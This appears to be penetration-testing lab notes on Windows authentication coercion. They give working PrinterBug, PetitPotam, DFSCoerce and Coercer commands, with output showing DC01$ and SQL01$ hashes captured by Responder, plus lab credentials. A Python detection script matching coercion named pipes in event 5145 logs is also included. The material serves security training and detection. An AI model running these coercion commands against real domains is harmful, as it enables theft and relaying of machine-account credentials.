Authentication Coercion

Authentication coercion differs from the poisoning or spoofing attacks covered in Farming Hashes (shares, WebDAV, MSSQL): this attack forces a client to authenticate to us even when it has no intention of doing so.

Authentication coercion techniques are target-centric rather than opportunistic. Coercion attacks usually rely on insecure code in some sensitive server-side protocols.

As @podalirius_ puts it: "The root cause of the 'vulnerability/feature' in these methods is that a Windows machine automatically authenticates to other machines when it tries to access a UNC path such as \\172.16.117.30\file.txt."

The sequence diagram below illustrates the idea of combining authentication coercion with a relay attack:
Pasted image 20260311134841.png

1. Common tools and techniques

Many tools that abuse SMB/HTTP NTLM authentication are introduced below. Despite their number, almost all of them follow the same procedure:

  • Authenticate to the remote machine with valid domain credentials (usually over SMB).
  • Connect to a remote SMB named pipe such as \PIPE\netdfs, \PIPE\efsrpc, \PIPE\lsarpc or \PIPE\lsass.
  • Bind to an RPC protocol so that its methods can be invoked against any target machine.
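
Every technique on this page opens one of those named pipes through the target's IPC$ share, which is exactly what Windows Security event 5145 (detailed file share auditing) records, with the pipe name in RelativeTargetName. The script below is an added detection example, not code from this page or from any of the tools it describes; it assumes a constructed, flattened key=value rendering of 5145 events (real events are XML, but the field names EventID, SubjectUserName, IpAddress, ShareName and RelativeTargetName are the ones the event carries) and maps each coercion pipe to the protocol and technique named in the sections that follow. Several distinct coercion pipes from one source in a short window is what Coercer's scan mode looks like from the target's side, so it is rated higher than a single hit.

```python
import re
from collections import defaultdict

# Named pipes reached via IPC$ that carry the coercion interfaces discussed on this page.
COERCION_PIPES = {
    "spoolss":  ("MS-RPRN",  "PrinterBug"),
    "efsrpc":   ("MS-EFSR",  "PetitPotam"),
    "lsarpc":   ("MS-EFSR",  "PetitPotam via \\PIPE\\lsarpc"),
    "netdfs":   ("MS-DFSNM", "DFSCoerce"),
    "eventlog": ("MS-EVEN",  "Coercer / ElfrOpenBELW"),
}
# lsarpc and eventlog carry plenty of legitimate traffic, so alone they only rate "low".
NOISY_PIPES = {"lsarpc", "eventlog"}

# Constructed sample records (not real telemetry): flattened Security event 5145 lines,
# plus one 5145 on a data share and one 4624 that the detection must ignore.
SAMPLE_LINES = [
    r"EventID=5145 SubjectUserName=plaintext$ SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.30 ShareName=\\*\IPC$ RelativeTargetName=lsarpc",
    r"EventID=5145 SubjectUserName=plaintext$ SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.30 ShareName=\\*\IPC$ RelativeTargetName=efsrpc",
    r"EventID=5145 SubjectUserName=plaintext$ SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.30 ShareName=\\*\IPC$ RelativeTargetName=netdfs",
    r"EventID=5145 SubjectUserName=jdoe SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.5 ShareName=\\*\IPC$ RelativeTargetName=srvsvc",
    r"EventID=5145 SubjectUserName=jdoe SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.5 ShareName=\\*\Data RelativeTargetName=reports\q3.xlsx",
    r"EventID=4624 TargetUserName=jdoe IpAddress=172.16.117.5 LogonType=3",
    r"EventID=5145 SubjectUserName=svc_backup SubjectDomainName=INLANEFREIGHT IpAddress=172.16.117.8 ShareName=\\*\IPC$ RelativeTargetName=lsarpc",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value record into a dict (values contain no spaces in this constructed format)."""
    return dict(FIELD_RE.findall(line))


def classify(event):
    """Return (pipe, protocol, technique) for an IPC$ open of a coercion pipe, else None."""
    if event.get("EventID") != "5145":
        return None
    if not event.get("ShareName", "").upper().endswith("IPC$"):
        return None
    pipe = event.get("RelativeTargetName", "").lower().lstrip("\\")
    if pipe not in COERCION_PIPES:
        return None
    protocol, technique = COERCION_PIPES[pipe]
    return pipe, protocol, technique


def analyze(lines):
    """Group hits per source IP; distinct coercion pipes from one source look like a Coercer scan."""
    per_source = defaultdict(lambda: {"pipes": set(), "accounts": set(), "techniques": set()})
    for line in lines:
        event = parse_event(line)
        hit = classify(event)
        if hit is None:
            continue
        pipe, _protocol, technique = hit
        entry = per_source[event.get("IpAddress", "?")]
        entry["pipes"].add(pipe)
        entry["accounts"].add(event.get("SubjectUserName", "?"))
        entry["techniques"].add(technique)
    for entry in per_source.values():
        strong = entry["pipes"] - NOISY_PIPES
        entry["severity"] = "high" if strong or len(entry["pipes"]) >= 2 else "low"
    return dict(per_source)


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LINES).items():
        print(ip, summary["severity"], sorted(summary["pipes"]), sorted(summary["accounts"]))
```

Event 5145 is only generated when "Audit Detailed File Share" is enabled on the target, and the account in SubjectUserName is the low-privileged credential used to trigger the coercion, not the machine account that ends up authenticating to the listener; correlate the source IP with the machine account's outbound NTLM logon to see both halves of the attack.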

1.1. MS-RPRN PrinterBug

The PrinterBug technique abuses the Print System Remote Protocol, a protocol used by the Print Spooler service, which runs by default on all Windows machines.

Specifically, PrinterBug abuses the RpcRemoteFindFirstPrinterChangeNotificationEx method. This method creates a remote change notification object that monitors changes to printer objects and sends change notifications to the print client using RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4).

Several tools implement this, including printerbug.py (Python), MSRPRN-coerce (Python) and SpoolSample (C#), as well as our favourite, nxc.

1.1.1. PrinterBug - SMB relay

python3 printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.3 172.16.117.30

[*] Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra

[*] Attempting to trigger authentication via rprn RPC at 172.16.117.3
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Here printerbug.py is used.

The NTLMv2-SSP hash is then captured:

python3 Responder.py -I ens192                  
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                 
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                   
                   |__|                                                                  

<SNIP>

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>

1.1.2. PrinterBug - HTTP relay

Use the same printerbug.py command as above, but remember to set the authentication target to a valid WebDAV connection string in the ATTACKER_MACHINE_NAME@PORT/PATH format:

printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.60 SUPPORTPC@80/print

[*] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at 172.16.117.60
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

  • ATTACKER_MACHINE_NAME must be the NetBIOS or DNS name of the attacker machine (Responder provides a default one at start-up; here we set it to SUPPORTPC)
  • PORT specifies the arbitrary port the WebDAV client will use to connect to the attacker machine
  • PATH specifies the arbitrary path the WebDAV client will try to reach

[*] [NBT-NS] Poisoned answer sent to 172.16.117.60 for name SUPPORTPC (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.16.117.60   for name supportpc.local
[*] [LLMNR]  Poisoned answer sent to 172.16.117.60 for name supportpc
[HTTP] Sending NTLM authentication request to fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Client   : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash     : SQL01$::INLANEFREIGHT:26f495d9cf2db5ee:4AA96074630A7A9F52DA1D66284DC2D9:0101000000000000993EE3BBDD<SNIP>

The NTLMv2 hash over HTTP is captured successfully.

1.2. MS-EFSR PetitPotam

PetitPotam abuses the EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv methods of the Encrypting File System Remote Protocol (MS-EFSR / EFSRPC). These methods also require valid domain credentials.

Before CVE-2021-36942 was patched, however, PetitPotam could be triggered without any credentials, and against any host in the domain (including DCs).

Suppose we have no valid domain credentials and encounter a host on which EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv have been patched. In that case we can try ly4k's PetitPotam, which implements additional methods not included in the original PetitPotam.

1.2.1. SMB authentication coercion with PetitPotam

It can be run as follows:

python3 PetitPotam.py 172.16.117.30 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local

              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.117.3[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

  • -u / -p specify the account and password; if we are relaying through ntlmrelayx, -no-pass can be used instead

python3 Responder.py -I ens192

  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|                                                                  

<SNIP>

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>

1.2.2. WebDAV authentication coercion with PetitPotam

Only the listener target needs to be changed to the WebDAV format:

 python3 PetitPotam.py WIN-MMRQDG2R0ZX@80/files 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe'

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

[*] [NBT-NS] Poisoned answer sent to 172.16.117.60 for name WIN-MMRQDG2R0ZX (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.16.117.60   for name win-mmrqdg2r0zx.local
[*] [LLMNR]  Poisoned answer sent to 172.16.117.60 for name win-mmrqdg2r0zx
[WebDAV] NTLMv2 Client   : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash     : SQL01$::INLANEFREIGHT:715dc37f7e25ef48:F5A3856A112F4159F0F2715AA1F31E22:0101000000000000E8C027D7D7<SNIP>

1.3. MS-DFSNM DFSCoerce

DFSCoerce abuses the NetrDfsAddStdRoot and NetrDfsRemoveStdRoot methods of the Distributed File System (DFS) Namespace Management Protocol (MS-DFSNM). As with the previous tools, valid domain credentials are needed to use it (DFSCoerce does not appear to be able to coerce HTTP NTLM authentication):

python3 dfscoerce.py -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' 172.16.117.30 172.16.117.3

[-] Connecting to ncacn_np:172.16.117.3[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
ServerName:                      '172.16.117.30\x00' 
RootShare:                       'test\x00' 
ApiFlags:                        1 


DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[SMB] NTLMv2-SSP Client   : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::INLANEFREIGHT:e2d2339638fc5fd6:D4979A923DD76BC3CFA418E94958E2B0:010100000000000000E0550D97C<SNIP>

1.4. Coercer (RPC)

Coercer is a powerful authentication coercion tool that automatically abuses 17 methods across 5 RPC protocols (for more information, see "Searching for RPC functions to coerce authentications in Microsoft protocols").

1.4.1. Scan mode

Scan mode tests the RPC calls listening on the target machine to determine whether we can abuse them to coerce authentication.

Coercer scan -t 172.16.117.50 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4-blackhat-edition
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting scan mode
[info] Scanning target 172.16.117.50
[+] Listening for authentications on '172.16.117.30', SMB port 445
[!] SMB named pipe '\PIPE\Fssagentrpc' is not accessible!
[!] SMB named pipe '\PIPE\efsrpc' is not accessible!
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\172.16.117.30\sXd63wiK\aa') 

1.4.2. Coerce mode

Coerce mode forces authentication by abusing RPC calls on the victim machine, so that we can forward it to a relay target with tools such as ntlmrelayx.

  • With the --always-continue option, Coercer does not ask whether to continue after each RPC call

Coercer coerce -t 172.16.117.50 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4-blackhat-edition
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target 172.16.117.50
[+] Coercing '172.16.117.50' to authenticate to '172.16.117.30'
[!] SMB named pipe '\PIPE\Fssagentrpc' is not accessible!
[!] SMB named pipe '\PIPE\efsrpc' is not accessible!
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\172.16.117.30\eYZugFvq\aa') 
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
   [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
      [>] (-testing-) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\MCdr2yRV\file.txt\x00')
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\MCdr2yRV\file.txt\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\TTT3UX3c\\x00')

1.4.3. HTTP NTLM Authentication Coercion

Coercer has an --auth-type option that lets us specify http or smb, depending on the type of NTLM authentication we want to coerce:

python3 Coercer.py -t 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -wh SUPPORTPC2 -wp 80 -v

       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v1.6
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[debug] Detected 5 usable pipes in implemented protocols.
[172.16.117.60] Analyzing available protocols on the remote machine and perform RPC calls to coerce authentication to None ...
         <SNIP>
         [>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
   [>] Pipe '\PIPE\lsarpc' is accessible!
         [>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
         [>] Binding to <uuid='c681d488-d850-11d0-8c52-00c04fd90f7e', version='1.0'> ... success
         [>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
         [>] Binding to <uuid='c681d488-d850-11d0-8c52-00c04fd90f7e', version='1.0'> ... success
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcOpenFileRaw' (opnum 0) ... rpc_s_access_denied
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcEncryptFileSrv' (opnum 4) ... ERROR_BAD_NETPATH (Attack has worked!)
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcDecryptFileSrv' (opnum 5) ... ERROR_BAD_NETPATH (Attack has worked!)
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcQueryUsersOnFile' (opnum 6) ... ERROR_BAD_NETPATH (Attack has worked!)
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcQueryRecoveryAgents' (opnum 7) ... ERROR_BAD_NETPATH (Attack has worked!)
      [>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcEncryptFileSrv' (opnum 12) ... ERROR_BAD_NETPATH (Attack has worked!)
<SNIP>

[+] All done!

[*] [LLMNR]  Poisoned answer sent to 172.16.117.60 for name supportpc2
[*] [MDNS] Poisoned answer sent to 172.16.117.60   for name supportpc2.local
[HTTP] Sending NTLM authentication request to fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Client   : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash     : SQL01$::INLANEFREIGHT:b3785e9c8db01fc7:3EBEBE5CE7E2B2C14D959CE368B3535D:0101000000000000C88<SNIP>

1.5. Manual exploitation

Besides using Coercer to abuse RPC calls automatically, we can also use the windows-coerced-authentication-methods GitHub repository to do the same thing manually.

Suppose we only want to abuse the NetrDfsAddStdRoot RPC call of the MS-DFSNM protocol: after cloning the repository, we first navigate to the folder containing the MS-DFSNM methods, then into the subfolder for the specific RPC call (NetrDfsAddStdRoot in this case).

Each RPC call folder contains a Python script named coerce_poc.py. We supply valid credentials, the domain name, the listener and the target to this script and run it:

 python3 coerce_poc.py -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local 172.16.117.30 172.16.117.3

Windows auth coerce using MS-DFSNM::NetrDfsAddStdRoot()

[>] Connecting to ncacn_np:172.16.117.3[\PIPE\netdfs] ... success
[>] Binding to <uuid='4fc742e0-4a10-11cf-8273-00aa004ae673', version='3.0'> ... success
[>] Calling NetrDfsAddStdRoot() ...
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

python3 Responder.py -I ens192

  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|                                                                  

<SNIP>

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>

1.6. Other techniques